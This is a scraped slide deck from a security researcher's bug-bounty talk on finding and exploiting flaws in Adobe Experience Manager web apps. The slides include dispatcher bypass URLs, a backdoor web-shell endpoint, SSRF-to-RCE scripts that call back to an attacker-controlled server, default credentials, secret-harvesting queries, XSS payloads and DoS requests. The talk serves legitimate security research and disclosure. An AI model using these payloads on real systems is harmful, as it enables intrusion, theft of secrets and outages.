Mikhail Egorov, profile picture
Uploaded byMikhail Egorov
PDF, PPTX15,506 views

AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs

The document outlines a presentation by security researcher Mikhail Egorov on vulnerabilities in Adobe Experience Manager (AEM) web applications, emphasizing their susceptibility in bug bounty programs. It details various techniques and tools used for discovering and exploiting security misconfigurations, including known vulnerabilities, RCE methods, and automation scripts. The session aims to raise awareness among bug hunters about the security risks associated with AEM webapps and encourages them to engage in testing for these vulnerabilities.

Download as PDF, PPTX
1 / 124
2 / 124
3 / 124
4 / 124
5 / 124
6 / 124
7 / 124
8 / 124
9 / 124
10 / 124
11 / 124
12 / 124
13 / 124
14 / 124
15 / 124
16 / 124
17 / 124
18 / 124
19 / 124
20 / 124
21 / 124
22 / 124
23 / 124
24 / 124
25 / 124
26 / 124
27 / 124
28 / 124
29 / 124
30 / 124
31 / 124
32 / 124
33 / 124
34 / 124
35 / 124
36 / 124
37 / 124
38 / 124
39 / 124
40 / 124
41 / 124
42 / 124
43 / 124
44 / 124
45 / 124
46 / 124
47 / 124
48 / 124
49 / 124
50 / 124
51 / 124
52 / 124
Most read
53 / 124
54 / 124
55 / 124
56 / 124
57 / 124
58 / 124
59 / 124
60 / 124
61 / 124
62 / 124
63 / 124
64 / 124
65 / 124
66 / 124
67 / 124
68 / 124
69 / 124
70 / 124
71 / 124
72 / 124
73 / 124
74 / 124
75 / 124
76 / 124
77 / 124
78 / 124
79 / 124
80 / 124
81 / 124
82 / 124
83 / 124
84 / 124
Most read
85 / 124
86 / 124
87 / 124
88 / 124
89 / 124
90 / 124
91 / 124
92 / 124
93 / 124
94 / 124
95 / 124
96 / 124
97 / 124
98 / 124
99 / 124
100 / 124
101 / 124
102 / 124
103 / 124
104 / 124
105 / 124
106 / 124
107 / 124
108 / 124
Most read
109 / 124
110 / 124
111 / 124
112 / 124
113 / 124
114 / 124
115 / 124
116 / 124
117 / 124
118 / 124
119 / 124
120 / 124
121 / 124
122 / 124
123 / 124
124 / 124
AEM hacker approaching Adobe Experience Manager webapps in bug bounty programs Mikhail Egorov @0ang3el
Mikhail Egorov • Whitehat, security researcher, bug hunter, conference speaker • Bugcrowd – https://www.bugcrowd.com/0ang3el • H1 – https://www.hackerone.com/0ang3el • Twitter - @0ang3el • GitHub - https://github.com/0ang3el • Slideshare - https://www.slideshare.net/0ang3el • Speakerdeck - https://speakerdeck.com/0ang3el • LinkedIn - https://www.linkedin.com/in/0ang3el 2/124
Why this talk? • A lot of AEM targets are in scope of BBP or VPD • AEM webapps are usually insecure • Security misconfigurations (AEM is complex) • Not installed security updates • Attract attention to AEM webapps insecurity • Motivate bug hunters to test AEM webapps 3/124
Topics to discuss • Methodology w/ bug examples • Automation • AEM Hacker Toolset – https://github.com/0ang3el/aem-hacker.git • AEM RCE bundle – https://github.com/0ang3el/aem-rce-bundle.git • Only known vulnerabilities and techniques are discussed!!! 4/124
Public BBP with AEM targets in scope 5/124
Public VPD with AEM targets in scope 6/124
Personal achievements in 2018 • Reported 84 non-duplicate bugs on Bugcrowd and H1 for AEM targets • P1s – 38 issues • P2s – 37 issues • P3s – 7 issues • P4s – 2 issue • Got 2 CVEs from Adobe PSIRT 7/124
Personal achievements in 2018 • P1s • RCE • Secrets disclosure (passwords, tokens) • P2s • Internal SSRF, High impact • Stored XSS • Application-level DoS, Easy Difficulty • P3s • Internal SSRF, Medium impact • Reflected XSS • Application-level DoS, Medium Difficulty • P4s • Reflected XSS, Flash-based 8/124
Previous works 2015 - https://www.slideshare.net/0ang3el/hacking-aem-sites 2016 - http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com- Remote-Code-Execution-Write-Up.html 2018 - https://speakerdeck.com/fransrosen/a-story-of-the-passive- aggressive-sysadmin-of-aem 2018 - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com- e48bf8f9cd3c 2018 - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem- webapps 9/124
AEM dispatcher
AEM architecture • Based on open source projects • Apache Felix • Apache Sling • Apache OAK JCR https://helpx.adobe.com/experience-manager/using/osgi_getting_started.html 11/124
Common AEM deployment Main blocks: • Author AEM instance • Publish AEM instance • AEM dispatcher (~WAF) Interacts with Publish server via AEM Dispatcher! 4503/tcp 4502/tcp 443/tcp ? 12/124
AEM dispatcher • In theory … a front end system offers an extra layer of security to your Adobe Experience Manager infrastructure • Often in practice … it’s the only security layer!!! • Admins rarely keep all components on Publish instance updated and securely configured! • Dispatcher bypasses allow to talk to those “insecure” components on Publish instance 13/124
AEM Dispatcher bypasses • CVE-2016-0957 • Bypasses for “interesting” servlets • Add multiple slashes • SSRF • Other 14/124
Using CVE-2016-0957 /filter { # Deny everything first and then allow specific entries /0001 { /type "deny" /glob "*" } /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only /0041 { /type "allow" /url "*.css" } # enable css /0042 { /type "allow" /url "*.gif" } # enable gifs /0043 { /type "allow" /url "*.ico" } # enable icos /0044 { /type "allow" /url "*.js" } # enable javascript /0045 { /type "allow" /url "*.png" } # enable png /0046 { /type "allow" /url "*.swf" } # enable flash /0047 { /type "allow" /url "*.jpg" } # enable jpg /0048 { /type "allow" /url "*.jpeg" } # enable jpeg /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization Policy dispatcher.any before CVE-2016-0957 15/124
Using CVE-2016-0957 # Deny content grabbing /0081 { /type "deny" /url "*.infinity.json" } /0082 { /type "deny" /url "*.tidy.json" } /0083 { /type "deny" /url "*.sysview.xml" } /0084 { /type "deny" /url "*.docview.json" } /0085 { /type "deny" /url "*.docview.xml" } /0086 { /type "deny" /url "*.*[0-9].json" } # Deny query (and additional selectors) /0090 { /type "deny" /url "*.query*.json" } } Policy dispatcher.any before CVE-2016-0957 16/124
Using CVE-2016-0957 Blocked Allowed https://aemsite/bin/querybuilder.json https://aemsite/bin/querybuilder.json/a.css https://aemsite/bin/querybuilder.json/a.html https://aemsite/bin/querybuilder.json/a.ico https://aemsite/bin/querybuilder.json/a.png https://aemsite/bin/querybuilder.json;%0aa.css https://aemsite/bin/querybuilder.json/a.1.json 17/124
Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 /filter { # Deny everything first and then allow specific entries /0001 { /type "deny" /glob "*" } # Allow non-public content directories /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only # Enable extensions in non-public content directories, using a regular expression /0041 { /type "allow" /extension '(clientlibs|css|gif|ico|js|png|swf|jpe?g|woff2?)’ } 18/124
Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 # Enable features /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization # Deny content grabbing, on all accessible pages, using regular expressions /0081 { /type "deny" /selectors '((sys|doc)view|query|[0-9-]+)’ /extension '(json|xml)’ } 19/124
Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 # Deny content grabbing for /content /0082 { /type "deny" /path "/content" /selectors '(feed|rss|pages|languages|blueprint|infinity|tidy)’ /extension '(json|xml|html)’ } } 20/124
Bypasses for “interesting” servlets https://aemsite/bin/querybuilder.json https://aemsite/bin/querybuilder.json/a.css https://aemsite/bin/querybuilder.json;%0aa.css https://aemsite/bin/querybuilder.json.servlet.css https://aemsite/bin/querybuilder.json.servlet.html https://aemsite/bin/querybuilder.json.servlet.ico https://aemsite/bin/querybuilder.json.servlet.png Blocked Allowed 21/124
Add multiple slashes • ///etc.json instead of /etc.json • ///bin///querybuilder.json instead of /bin/querybuilder.json 22/124
Using SSRF • We need SSRF in a component that is allowed by AEM dispatcher policy • SSRF should allow to send GET request and see response • Opensocial (Shindig) proxy • SSRF in ReportingServicesProxyServlet (CVE-2018-12809) 23/124
Automation
AEM RCE bundle • AEM RCE bundle – https://github.com/0ang3el/aem-rce-bundle.git • Has pre-build OSGI bundle for AEM 6.2 or newer • Allows to get RCE when you have access to Felix Console • Happens when you guessed admin credentials 25/124
AEM RCE bundle, build yourself mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate -DarchetypeGroupId=com.adobe.granite.archetypes -DarchetypeArtifactId=aem-project-archetype -DarchetypeVersion=11 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ mvn org.apache.maven.plugins:maven-archetype-plugin:2.4:generate -DarchetypeGroupId=com.day.jcr.vault -DarchetypeArtifactId=multimodule-content-package-archetype -DarchetypeVersion=1.0.2 -DarchetypeCatalog=https://repo.adobe.com/nexus/content/groups/public/ For AEM 6.0 or newer For AEM 5.6 26/124
AEM RCE bundle /bin/backdoor.html?cmd=ifconfig 27/124
AEM hacker toolset • Toolset – https://github.com/0ang3el/aem-hacker.git • Includes scripts • aem_hacker.py • aem_discoverer.py • aem_enum.py • aem_ssrf2rce.py, aem_server.py, response.bin • aem-rce-sling-script.sh 28/124
aem_hacker.py • Main tool – scans AEM webapp for misconfigurations and vulnerabilities • Tries to bypass AEM dispatcher • You need to run it from VPS to detect SSRFs! • You need to do extra manual work to detect if findings are exploitable 29/124
aem_hacker.py python3 aem_hacker.py -h usage: aem_hacker.py [-h] [-u URL] [--proxy PROXY] [--debug] [--host HOST] [--port PORT] [--workers WORKERS] AEM hacker by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit -u URL, --url URL url to scan --proxy PROXY http and https proxy --debug debug output --host HOST hostname or IP to use for back connections during SSRF detection --port PORT opens port for SSRF detection --workers WORKERS number of parallel workers 30/124
aem_hacker.py python3 aem_hacker.py -u https://aem.webapp --host your_vps_hostname_ip • Common usage 31/124
aem_hacker.py – checks 1/3 • Exposed DefaultGetServlet • Exposed QueryBulderJsonServlet and QueryBuilderFeedServlet • Exposed GQLServlet • Exposed POSTServlet • Exposed LoginStatusServlet • Users with default password • Exposed Felix Console • Enabled WCMDebugFilter 32/124
aem_hacker.py – checks 2/3 • Exposed WCMSuggestionsServlet • Exposed AuditlogServlet • Exposed CRXDE logs • Exposed CRXDE and CRX • SSRF SalesforceSecretServlet • SSRF ReportingServicesServlet • SSRF SitecatalystServlet • SSRF AutoprovisioningServlet 33/124
aem_hacker.py – checks 3/3 • SSRF OpensocialProxy • SWF XSSes • Deser ExternalJobServlet • Exposed Webdav • Exposed Groovy Console • Exposed ACS AEM Tools 34/124
aem_discoverer.py • Allows to scan urls and find AEM webapps among them • Tries to bypass AEM dispatcher • Common usage python3 aem_discoverer.py --file urls.txt --workers 150 35/124
aem_discoverer.py python3 aem_discoverer.py -h usage: aem_discoverer.py [-h] [--file FILE] [--proxy PROXY] [--debug] [--workers WORKERS] AEM discoverer by @0ang3el, see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit --file FILE file with urls --proxy PROXY http and https proxy --debug debug output --workers WORKERS number of parallel workers 36/124
aem_enum.py • Automate usernames and secrets grabbing • Traverses JCR using DefaultGetServlet of AEM 37/124
aem_enum.py python3 aem_enum.py -h usage: aem_enum.py [-h] [--url URL] [--base BASE] [--grabdepth GRABDEPTH] [--maxdepth MAXDEPTH] [--workers WORKERS] [--out OUT] [--proxy PROXY] [--debug] AEM exploration tool by @0ang3el (grabs users and secrets), see the slides - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps optional arguments: -h, --help show this help message and exit --url URL AEM webapp URL, required parameter --base BASE set base node (/etc or /apps or /home or /var), if not set, base node is selected automatically --grabdepth GRABDEPTH JCR subtree depth on each iteration, 2 should be a safe value for all nodes --maxdepth MAXDEPTH maximum depth for JCR search, increase it to find more --workers WORKERS number of parallel workers --out OUT CSV file with results, delimiter symbol is | --proxy PROXY http and https proxy --debug debug output 38/124
aem_enum.py • Common usage • Change start node python3 aem_enum.py --url https://aem.webapp python3 aem_enum.py --url https://aem.webapp --base /etc 39/124
aem_ssrf2rce.py & aem_server.py • aem_ssrf2rce.py & aem_server.py + response.bin • Helps to exploit SSRF in SitecatalystServlet or AutoprovisioningServlet as RCE • It should work on AEM before AEM-6.2-SP1-CFP7 running on Jetty • Exploits reverse replication to get RCE after joining topology using SSRF 40/124
aem_ssrf2rce.py python3 aem_ssrf2rce.py -h usage: aem_ssrf2rce.py [-h] [--url URL] [--fakeaem FAKEAEM] [--proxy PROXY] optional arguments: -h, --help show this help message and exit --url URL URL for SitecatalystServlet or AutoprovisioningServlet, including path, without query part --fakeaem FAKEAEM hostname/ip of fake AEM server --proxy PROXY http and https proxy 41/124
aem_ssrf2rce.py & aem_server.py • Place aem_server.py and response.bin on your VPS • Run aem_server.py script python3 aem_server.py starting fake AEM server... running server... 42/124
aem_ssrf2rce.py & aem_server.py • Run aem_ssrf2rce.py script python3 aem_ssrf2rce.py --url https://aem.webapp/libs/cq/analytics/components/sitecatalystpage/segments.json.servlet --fakeaem your_vps_hostname_ip 43/124
aem_ssrf2rce.py & aem_server.py • If RCE is possible, you should see incoming connection to your fake AEM server • Shell is accessible from https://aem.webapp/rcenode.html?Vgu9BKV9zdvJNByNh9NB=ls 44/124
aem-rce-sling-script.sh • Allows to get RCE when Felix Console is not available, but you have permissions to create new nodes under /apps JCR node • Usage • Shell is available at https://aem.webapp/rcenode.html?cmd=ls ./aem-rce-sling-script.sh https://aem.webapp username password 45/124
Methodology
Insecurity of bundles and packages
RCE via exposed Groovy console https://github.com/OlsonDigital/aem-groovy-console 48/124
RCE via exposed Groovy console • Exposes servlet at without authentication 49/124
RCE via exposed Groovy console 50/124
RCE via ACS AEM Tools • https://adobe-consulting-services.github.io/acs-aem-tools/ 51/124
RCE via ACS AEM Tools • Exposes Fiddle with ability to execute JSP scripts at • • May or may not require authentication 52/124
RCE via ACS AEM Tools 53/124
Leveraging different levels of access
What can you do w/ valid creds? • RCE • Deface site – create/modify/delete content • Persistent XSS 55/124
How to get valid creds? • Default credentials • admin:admin • author:author • Bruteforce creds • properties , , , etc. contain usernames • automates usernames grabbing • AEM supports basic authorization 56/124
RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps WebDAV 57/124
RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload AEM RCE OSGI bundle WebDAVhttps://github.com/0ang3el/aem-rce-bundle.git 58/124
RCE via uploading OSGI bundle 59/124
RCE via uploading OSGI bundle 60/124
RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload JSP script to /apps WebDAV https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html aem-rce-sling-script.sh 61/124
RCE via credentials of privileged user Felix Console Sling Scripting admin:admin SlingPOSTServlet Other /system/console/bundles /apps Upload JSP script to /apps WebDAV cadaver https://aem.webapp/crx/repository/crx.default https://sling.apache.org/documentation/getting-started/discover-sling-in-15-minutes.html 62/124
Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Lite 63/124
Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Lite https://sling.apache.org/documentation/bundles/manipulating-content-the-slingpostservlet-servlets-post.html 64/124
Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Lite cadaver https://aem.webapp/crx/repository/crx.default 65/124
Author user author:author SlingPOSTServlet WebDAV Create, modify, delete any node in /content Other CRXDE Litehttps://aem.webapp/crx/de/index.jsp 66/124
Non-privileged user SlingPOSTServlet WebDAV Find node with weak ACL Other CRXDE Lite hasPermission predicate of Querybuilder 67/124
Non-privileged user SlingPOSTServlet WebDAV Find node with weak ACL Other CRXDE Lite hasPermission predicate of Querybuilder https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html#hasPermission 68/124
Anonymous user SlingPOSTServlet WebDAV Find node with weak ACL Other CRXDE Lite /content/usergenerated /content/usergenerated/etc/commerce/smartlists hasPermission predicate of Querybuilder Anonymous usually has jcr:write permission for node Anonymous usually has jcr:addChildNode permission for node 69/124
Tricks to get persistent XSS • SVG in property value • create property with SVG content • add /a.svg to the URL • HTML in property value • create property with HTML content and name aaa.html • jcr:data and jcr:mimeType (upload file) • Other 70/124
Anonymous user & SVG 71/124
Anonymous user & SVG 72/124
Anonymous user & SVG 73/124
Anonymous user & HTML prop 74/124
Anonymous user & HTML prop 75/124
Anonymous user & upload file 76/124
Anonymous user & upload file 77/124
Extracting secrets from JCR
Extracting secrets from JCR • Everything is stored in JCR repository as node properties including: • Secrets (passwords, encryption keys, tokens) • Configuration • PII • Usernames 79/124
Why is it possible? • ACL is misconfigured for a JCR node, storing secrets • Admins rely on AEM dispatcher protection 80/124
What to use • DefaultGetServlet • QueryBuilderJsonServlet • QueryBuilderFeedServlet • GQLSearchServlet • Other 81/124
DefaultGetServlet • Allows to get JCR node with its props • Selectors • tidy • infinity • numeric value: -1, 0, 1 … 99999 • Formats • json • xml • res 82/124
DefaultGetServlet https://aem.site/.tidy.3.json jcr:root selector tidy selector depth output format Get JCR nodes with props starting from jcr:root with depth 3 and return formatted JSON 83/124
DefaultGetServlet - How to grab • Get node names, start from • /.1.json • /.ext.json • /.childrenlist.json • Or guess node names: • Common names - /content, /home, /var, /etc • Dump props for each child node of • /etc.json or /etc.5.json or /etc.-1.json 84/124
DefaultGetServlet – What to grab • Interesting nodes • /etc – may contain secrets (passwords, enc. keys, …) • /apps/system/config or /apps/<smth>/config (passwords, …) • /var – may contain private information (PII) • /home – password hashes, PII • Interesting props – contain AEM users names • jcr:createdBy • jcr:lastModifiedBy • cq:LastModifiedBy 85/124
DefaultGetServlet – In the wild /apps/<redacted>/config.author.tidy.1..json/a.ico 86/124
DefaultGetServlet – In the wild /etc/ocs/libs/puppet/bootstrap/etc/ssl/private/ocs-x509-client-key.pem/jcr:content/jcr:data.tidy.-1…json/b.gif 87/124
QueryBuilder servlets • We can search JCR using different predicates • https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder- predicate-reference.html • QueryBuilderJsonServlet allows to get Nodes and their Props • /bin/querybuilder.json • QueryBuilderFeedServlet allows to get Nodes (no Props) • /bin/querybuilder.feed.servlet • we can use blind binary search for Props 88/124
Examples of useful searches • type=nt:file&nodename=*.zip • path=/home&p.hits=full&p.limit=-1 • hasPermission=jcr:write&path=/content • hasPermission=jcr:addChildNodes&path=/content • hasPermission=jcr:modifyProperties&path=/content • p.hits=selective&p.properties=jcr%3alastModifiedBy&property=jcr%3alast ModifiedBy&property.operation=unequals&property.value=admin&type=n t%3abase&p.limit=1000 • path=/etc&path.flat=true&p.nodedepth=0 • path=/etc/replication/agents.author&p.hits=full&p.nodedepth=-1 89/124
QueryBuilder – In the wild type=nt:file&nodename=*.zip 90/124
QueryBuilder – In the wild path=/home&p.hits=full&p.limit=-1 91/124
QueryBuilder – In the wild path=/apps/system/config 92/124
QueryBuilder – In the wild hasPermission=jcr:write&path=/content 93/124
Exploiting SSRFs
Opensocial (Shindig) proxy • SSRF via Opensocial (Shindig) proxy • • • Allows to send GET request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from internal network services • Bypass AEM dispatcher and ex-filtrate secrets from JCR • Reflected XSS 95/124
Opensocial (Shindig) proxy 96/124
ReportingServicesProxyServlet • SSRF via ReportingServicesProxyServlet (CVE-2018-12809) • • • Allows to send GET request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from internal network services • Bypass AEM dispatcher and ex-filtrate secrets from JCR • Reflected XSS 97/124
ReportingServicesProxyServlet 98/124
ReportingServicesProxyServlet 99/124
SalesforceSecretServlet 100/124 • SSRF via SalesforceSecretServlet (CVE-2018-5006) • • Allows to send POST request to an arbitrary URL and see response • Suitable for • Ex-filtrate secrets from some internal network services • POST ≡ GET • Reflected XSS
SalesforceSecretServlet 101/124
SalesforceSecretServlet 102/124
SiteCatalystServlet • SSRF via SiteCatalystServlet • • • Allows to send POST request to an arbitrary URL blindly, allows to send arbitrary headers (CRLF injection) • Suitable for • Access internal network services (hard in blackbox scenario) • RCE (requires specific AEM version and appserver) 103/124
AutoProvisioningServlet 104/124
AutoProvisioningServlet • SSRF via AutoProvisioningServlet • • Allows to send POST request to an arbitrary URL blindly, allows to send arbitrary headers (CRLF injection) • Suitable for • Access internal network services (hard in blackbox scenario) • RCE (requires specific AEM version and appserver) 105/124
AutoProvisioningServlet 106/124
SSRF >>> RCE • It’s possible to escalate SSRFs in SiteCatalystServlet and AutoProvisioningServlet to RCE on Publish server • Requirements • AEM 6.2 before AEM-6.2-SP1-CFP7 fix pack • Jetty appserver (default installation) 107/124
2/110 https://www.youtube.com/watch?v=awPJRIR47jo
Old tricks
ExternalJobPostServlet • Old bug, affects AEM 5.5 – 6.1 • http://aempodcast.com/2016/podcast/aem-podcast-java-deserialization-bug/ • • Parameter accepts Java serialized stream and passes to 110/124
ExternalJobPostServlet 111/124
ExternalJobPostServlet 112/124
XXE via WebDAV • Old bug, CVE-2015-1833 • It’s possible to read local files with PROPFIND/PROPPATCH • https://www.slideshare.net/0ang3el/what-should-a-hacker-know-about-webdav 113/124
Check WebDAV support • Send request • header in response contain webdav-related methods • Navigate to • 401 HTTP and WWW-Authenticate: Basic realm="Adobe CRX WebDAV" 114/124
Reflected XSS
Vectors • SWF XSSes (kudos to @fransrosen) • WCMDebugFilter XSS – CVE-2016-7882 • See Philips XSS case @JonathanBoumanium • Many servlets return HTML tags in JSON response • SuggestionHandlerServlet (reflect parameter) 116/124
VideoPlayer.swf /etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf.res?stagesize=1&namespacePrefix=alert(document.domain)-window 117/124
WCMDebugFilter /.1.x.%3Csvg%20onload%3dSet.constructor('ale'+'rt(document.domain)')()%20...json?debug=layout 118/124
SuggestionHandlerServlet /bin/wcm/contentfinder/connector/suggestions.json/a.html?query_term=path%3a/&pre=%3Csvg+onload%3dalert(document.domain)%3E &post=yyyy 119/124
Application-level DoS
DoS is easy • /.ext.infinity.json • /.ext.infinity.json?tidy=true • /bin/querybuilder.json?type=nt:base&p.limit=-1 • /bin/wcm/search/gql.servlet.json?query=type:base%20limit:..-1&pathPrefix= • /content.assetsearch.json?query=*&start=0&limit=10&random=123 • /..assetsearch.json?query=*&start=0&limit=10&random=123 • /system/bgservlets/test.json?cycles=999999&interval=0&flushEvery=111111111 121/124
DoS is easy /content.ext.infinity.1..json?tidy=true 122/124
Conclusion • AEM target is a goldmine for a bug hunter • I hope my work will help to approach AEM targets 123/124
THANK U! @0ang3el

More Related Content

PDF
Hunting for security bugs in AEM webapps
byMikhail Egorov
 
PDF
Securing AEM webapps by hacking them
byMikhail Egorov
 
PDF
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
PDF
A story of the passive aggressive sysadmin of AEM
byFrans Rosén
 
PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
PDF
XSS Magic tricks
byGarethHeyes
 
PPTX
Waf bypassing Techniques
byAvinash Thapa
 
PDF
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 
Hunting for security bugs in AEM webapps
byMikhail Egorov
 
Securing AEM webapps by hacking them
byMikhail Egorov
 
Hacking Adobe Experience Manager sites
byMikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
byFrans Rosén
 
Bug Bounty Hunter Methodology - Nullcon 2016
bybugcrowd
 
XSS Magic tricks
byGarethHeyes
 
Waf bypassing Techniques
byAvinash Thapa
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
byFrans Rosén
 

What's hot

PDF
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
byhacktivity
 
PDF
A Hacker's perspective on AEM applications security
byMikhail Egorov
 
PDF
What should a hacker know about WebDav?
byMikhail Egorov
 
PDF
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
PDF
Offzone | Another waf bypass
byДмитрий Бумов
 
PDF
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
PDF
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
byAbraham Aranguren
 
PDF
Ekoparty 2017 - The Bug Hunter's Methodology
bybugcrowd
 
PDF
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
PPTX
SSRF For Bug Bounties
byOWASP Nagpur
 
PPTX
Attacking thru HTTP Host header
bySergey Belov
 
PDF
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
byMikhail Egorov
 
PPTX
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
byCODE BLUE
 
PPTX
Reverse proxies & Inconsistency
byGreenD0g
 
PPTX
Host Header injection - Slides
byAmit Dubey
 
PPTX
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
PDF
Bug Bounty - Hackers Job
byArbin Godar
 
PPTX
PSConfEU - Offensive Active Directory (With PowerShell!)
byWill Schroeder
 
PPTX
Dangling DNS records takeover at scale
byChandrapal Badshah
 
PDF
Attacking Drupal
byGreg Foss
 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
byhacktivity
 
A Hacker's perspective on AEM applications security
byMikhail Egorov
 
What should a hacker know about WebDav?
byMikhail Egorov
 
Neat tricks to bypass CSRF-protection
byMikhail Egorov
 
Offzone | Another waf bypass
byДмитрий Бумов
 
Building Advanced XSS Vectors
byRodolfo Assis (Brute)
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
byAbraham Aranguren
 
Ekoparty 2017 - The Bug Hunter's Methodology
bybugcrowd
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
byMasato Kinugawa
 
SSRF For Bug Bounties
byOWASP Nagpur
 
Attacking thru HTTP Host header
bySergey Belov
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
byMikhail Egorov
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
byCODE BLUE
 
Reverse proxies & Inconsistency
byGreenD0g
 
Host Header injection - Slides
byAmit Dubey
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
bySoroush Dalili
 
Bug Bounty - Hackers Job
byArbin Godar
 
PSConfEU - Offensive Active Directory (With PowerShell!)
byWill Schroeder
 
Dangling DNS records takeover at scale
byChandrapal Badshah
 
Attacking Drupal
byGreg Foss
 

Similar to AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs

PDF
4 andrii kudiurov - web application security 101
byIevgenii Katsan
 
PPTX
Burp Suite is a powerful and widely-used tool
bywaudit1
 
PPTX
OWASP TOP 10
byRobert MacLean
 
PDF
End to end web security
byGeorge Boobyer
 
PDF
Web Security - Introduction
bySQALab
 
ODP
Hunting Security Bugs in Modern Web Applications
byToe Khaing
 
PDF
DrupalCamp London 2017 - Web site insecurity
byGeorge Boobyer
 
PDF
Web Security - Introduction v.1.3
byOles Seheda
 
PDF
Getting Inside Common Web Security Threats
byAndy Longshaw
 
PDF
Drupal, lessons learnt from real world security incidents
bysydneydrupal
 
PPTX
Owasp web application security trends
bybeched
 
PPTX
[2.1] Web application Security Trends - Omar Ganiev
byOWASP Russia
 
PDF
Is your python application secure? - PyCon Canada - 2015-11-07
byFrédéric Harper
 
PDF
Web Security 101
byBrent Shaffer
 
PDF
Do you lose sleep at night?
byNathan Van Gheem
 
PDF
Tietoturvallisuuden_kevatseminaari_2013_Jarno_Niemela
byValtiokonttori / Statskontoret / State Treasury of Finland
 
PDF
Approach to find critical vulnerabilities
byAshish Kunwar
 
PPT
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
byZack Meyers
 
PDF
Drupal Camp Bristol 2017 - Website insecurity
byGeorge Boobyer
 
PPTX
AppSecEU2016-Amol-Sarwate-2016-State-of-Vulnerability-Exploits.pptx
byEthioTelecom_Getahun Biratu
 
4 andrii kudiurov - web application security 101
byIevgenii Katsan
 
Burp Suite is a powerful and widely-used tool
bywaudit1
 
OWASP TOP 10
byRobert MacLean
 
End to end web security
byGeorge Boobyer
 
Web Security - Introduction
bySQALab
 
Hunting Security Bugs in Modern Web Applications
byToe Khaing
 
DrupalCamp London 2017 - Web site insecurity
byGeorge Boobyer
 
Web Security - Introduction v.1.3
byOles Seheda
 
Getting Inside Common Web Security Threats
byAndy Longshaw
 
Drupal, lessons learnt from real world security incidents
bysydneydrupal
 
Owasp web application security trends
bybeched
 
[2.1] Web application Security Trends - Omar Ganiev
byOWASP Russia
 
Is your python application secure? - PyCon Canada - 2015-11-07
byFrédéric Harper
 
Web Security 101
byBrent Shaffer
 
Do you lose sleep at night?
byNathan Van Gheem
 
Tietoturvallisuuden_kevatseminaari_2013_Jarno_Niemela
byValtiokonttori / Statskontoret / State Treasury of Finland
 
Approach to find critical vulnerabilities
byAshish Kunwar
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
byZack Meyers
 
Drupal Camp Bristol 2017 - Website insecurity
byGeorge Boobyer
 
AppSecEU2016-Amol-Sarwate-2016-State-of-Vulnerability-Exploits.pptx
byEthioTelecom_Getahun Biratu
 

Recently uploaded

PPTX
C++ Chapter about pointers in programming
byfirehiwot8
 
PDF
Categorisation_of_Cyber_Attacks for hnd pearson level 4 students
byhawa175590
 
PPTX
C++ chapter 1-Introduction to Computer Programming.pptx
byfirehiwot8
 
PPT
Tools in communication technologies - CT
byswisssom2025
 
PPTX
Python Oops concepts of power point presentation
bySwapnitaKendre
 
PDF
Comprehensive IT Infrastructure Solutions.pdf
byDurocorre
 
PPTX
Intellectual Property Code of the Philippines_20251030_085011_0000.pptx
byronthefourth
 
PDF
Empower Your Brand with YouRefresh’s Online Hub Builder
byyourefreshdm
 
PPT
C++ Chapter 6-pointers about pointers in programming
byfirehiwot8
 
PPTX
